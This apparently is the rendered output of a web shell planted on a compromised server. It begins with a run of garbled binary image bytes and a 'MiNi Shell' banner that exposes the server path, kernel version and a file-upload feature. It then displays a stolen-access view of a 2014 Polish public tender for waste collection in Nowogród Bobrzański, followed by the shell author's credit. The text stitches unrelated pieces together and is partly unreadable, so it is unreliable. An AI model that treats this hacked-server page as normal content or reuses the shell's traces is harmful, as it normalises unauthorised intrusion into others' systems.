JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140317/89178-N-2014.html

<p class="kh_header"><b>Nowogród Bobrzański: Wykonanie usługi w zakresie odbioru i zagospodarowania odpadów komunalnych                     w regionalnej  instalacji do przetwarzania odpadów komunalnych.</b><br>
<b>Numer ogłoszenia: 89178 - 2014; data zamieszczenia: 17.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej w Nowogrodzie Bobrzańskim Sp. z o.o. , ul. Dąbrowskiego 10, 66-010 Nowogród Bobrzański, woj. lubuskie, tel. 68 327 65 50, faks 68 327 64 67.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi w zakresie odbioru i zagospodarowania odpadów komunalnych                     w regionalnej  instalacji do przetwarzania odpadów komunalnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem umowy  jest wykonanie usługi w zakresie odbioru, transportu, przyjęcia  i zagospodarowania niesegregowanych (zmieszanych) odpadów komunalnych, odpadów kuchennych ulegających biodegradacji oraz odpadów ulegających biodegradacji z miejsca magazynowania na  instalację mechaniczno -  biologicznego przetwarzania zmieszanych odpadów komunalnych, zgodnie   z obowiązującymi przepisami ustawy o odpadach z dnia   14 grudnia 2012 roku opublikowanej w Dz. U. z 2013 roku poz. 21 oraz innymi przepisami prawa, w tym w  zakresie ochrony środowiska.

1.1.	Ilość  i rodzaj  odpadów 
- niesegregowane (zmieszane) odpady komunalne - kod odpadu 20 03 01 - 1500 Mg
-odpady kuchenne ulegające biodegradacji          - kod odpadu 20 01 08 -     10 Mg
-odpady ulegające biodegradacji                        - kod odpadu 20 02 01 -     30 Mg

1.2	Wykonawca zobowiązany jest do odbioru odpadów stanowiących przedmiot zamówienia           z  bazy przeładunkowo - transportowej zlokalizowanej na Mikroregionalnym Składowisku Odpadów      w Klępinie  2 razy w tygodniu.
1.3	Odbiór odpadów odbywać się będzie  w dniach od poniedziałku do piątku w godzinach 7:00 do 16:00.
1.4 Zamawiający  dopuszcza możliwość realizacji przedmiotu umowy w inne dni, w tym także      ustawowo wolne od pracy lub w innych godzinach, po uprzednim uzgodnieniu  z Wykonawcą.
1.5	W ramach realizacji umowy ( na czas trwania umowy)  oraz w ramach zaoferowanej  ceny Wykonawca zobowiązuje się do:
a) dostarczenia  na składowisko w Klępinie 2 sztuk kontenerów o pojemności 36 m3  każdy   na   odbierane odpady.
1.6 Załadunek odpadów komunalnych  do kontenerów wykonuje  ZAMAWIAJĄCY.
1.7.Wszystkie odpady będące przedmiotem zamówienia  będą  ważone na legalizowanej wadze samochodowej   Zamawiającego.
1.8.	Fakt odbioru oraz  ilość odebranych odpadów przez Wykonawcę  będą potwierdzane każdorazowo kwitem wagowym. Osoba przekazująca odpady w imieniu Zamawiającego, w momencie ich przekazania deklaruje w szczególności i poświadcza własnoręcznym podpisem na dokumencie przekazania ilość, rodzaj oraz kod odpadu. 
Osoba odbierająca odpady w imieniu Wykonawcy weryfikuje dane na dokumencie wagowym                i potwierdza czytelnym podpisem.
W razie sporu co do rodzaju odpadów analiza spornego materiału zostanie przeprowadzona              w siedzibie Wykonawcy przy udziale przedstawicieli obydwóch stron i ewentualnym udziale niezależnego biegłego rzeczoznawcy. Koszt biegłego oraz ewentualnych analiz laboratoryjnych pokryje strona, która w ww. sporze nie miała racji. Jeżeli okaże się, ze Zamawiający przekazał odpady niezgodne z niniejszą umową, to jest on zobowiązany do niezwłocznego ich usunięcia, najpóźniej w ciągu 2 (dwóch) dni roboczych,  i unieszkodliwienia na własny koszt z zachowaniem obowiązujących wymogów prawnych. W przypadku zaniechania tego obowiązku, Wykonawca dokona sam unieszkodliwienia, bądź zleci ich unieszkodliwienie firmie trzeciej na koszt Zamawiającemu.
1.9.Wykonawca zobowiązuje się do poddawania odpadów będących przedmiotem umowy  odpowiednio procesom:
-Odzysku surowców wtórnych i organiki zawartej w odpadach komunalnych zmieszanych;
- Składowania odpadów na składowisku odpadów innych niż niebezpieczne i obojętne;
-Recyklingu organicznego;
 celem osiągnięcia poziomu odzysku i recyklingu, zgodnie z obowiązującymi przepisami.
Wykonawca  będzie przekazywał Zamawiającemu informacje  konieczne do rozliczenia   osiąganych poziomów  odzysku i recyklingu poszczególnych grup odpadów w okresie kwartalnym ( w terminie do 14 dni po zakończeniu danego kwartału) oraz  rocznym  ( w terminie do 15 stycznia  2015 r.)
1.10 Zamawiający będzie sporządzał  miesięczne zbiorcze  karty  przekazania odpadu i dostarczał     je  Wykonawcy w terminie do 10-go dnia następnego miesiąca w celu ich potwierdzenia.
 1.11 Zamawiający zastrzega, ze podane ilości są ilościami szacunkowymi, obrazują możliwą wielkość  i zakres przedmiotu zamówienia oraz mogą być pomocne na etapie przygotowania oferty.
 1.12. Faktury wystawiane będą w miesięcznym cyklu rozliczeniowym.
Podstawą do wystawienia faktury i określeniem należnej opłaty będzie ilość dostarczonych odpadów  w danym miesiącu  pomnożona przez aktualną stawkę za odbiór poszczególnych rodzajów odpadów wynikającą z Umowy.
1.13.Instalacja, która zarządza  Wykonawca musi posiadać  status regionalnej lub regionalnej zastępczej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu zachodniego w  województwie lubuskim, zgodnie  z uchwałą nr XXX/281/12 Sejmiku Województwa Lubuskiego z dnia 10 września 2012 r.  w sprawie wykonania Planu gospodarki odpadami  dla Województwa  Lubuskiego na lat 2012-2017 z perspektywą do 2020, zmienionej uchwałą nr XXXIII/352/12   z dnia 19 grudnia 2012 r., zmieniającą uchwałę w sprawie wykonania Planu gospodarki odpadami dla województwa lubuskiego na lata 2012 -2017 z perspektywą do 2020 roku (Dz. Urz. Woj. Lubuskiego  poz.2866.).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia uzupełniającego jest wykonanie usługi w zakresie odbioru, transportu, przyjęcia  i zagospodarowania niesegregowanych (zmieszanych) odpadów komunalnych, odpadów kuchennych ulegających biodegradacji oraz odpadów ulegających biodegradacji z miejsca magazynowania na  instalację mechaniczno -  biologicznego przetwarzania zmieszanych odpadów komunalnych, zgodnie   z obowiązującymi przepisami ustawy o odpadach z dnia   14 grudnia 2012 roku opublikowanej w Dz. U. z 2013 roku poz. 21 oraz innymi przepisami prawa, w tym w  zakresie ochrony środowiska- do 50% zamówienia podstawowego- zgodnie z art. 67 ust.1 pkt 6 ustawy pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli  wykonawca przedstawi:     1)Zaświadczenie o  wpisie do rejestru ewidencji działalności regulowanej w zakresie    prowadzonej  przez Burmistrza Nowogrodu Bobrzańskiego dotyczącej podmiotów  uprawnionych do prowadzenia działalności gospodarczej w zakresie odbioru  odpadów komunalnych z obszaru gminy Nowogrodu Bobrzańskiego.
2)Aktualna decyzję - zezwolenie odpowiednich organów na zbieranie i transport odpadów komunalnych    obejmującego odpady będące przedmiotem zamówienia.
3)Oświadczenie, że instalacja którą zarządza Wykonawca posiada status regionalnej lub regionalnej zastępczej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu zachodniego  w  województwie lubuskim, zgodnie z uchwałą nr XXX/281/12 Sejmiku Województwa Lubuskiego z dnia 10 września 2012 r.  w sprawie wykonania Planu gospodarki odpadami  dla Województwa  Lubuskiego na lat 2012-2017 z perspektywą do 2020, zmienionej uchwałą nr XXXIII/352/12 z dnia 19 grudnia 2012 r., zmieniającą uchwałę w sprawie wykonania Planu gospodarki odpadami dla województwa lubuskiego na lata 2012 -2017 z perspektywą do 2020 roku (Dz. Urz. Woj. Lubuskiego  poz.2866)- jest zawarte w formularzy ofertowym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży  oświadczenie                        o  spełnieniu warunków określonych w art.22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży  oświadczenie                        o  spełnieniu warunków określonych w art.22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży  oświadczenie                        o  spełnieniu warunków określonych w art.22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży  oświadczenie                        o  spełnieniu warunków określonych w art.22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru -  załącznik nr 1  do  SIWZ.
b) dokumenty potwierdzające uprawnienie  osób podpisujących ofertę, (np. oryginał pełnomocnictwa lub kopia notarialnie poświadczona), o ile nie wynika to  z przepisów prawa lub innych dokumentów rejestrowych;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgkimnb.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej w Nowogrodzie Bobrzańskim Sp. z o.o ul. Dąbrowskiego 10, 66-010 Nowogród Bobrzański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2014 godzina 11:30, miejsce: Zakład Gospodarki Komunalnej i Mieszkaniowej w Nowogrodzie Bobrzańskim Sp. z o.o ul. Dąbrowskiego 10, 66-010 Nowogród Bobrzański.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com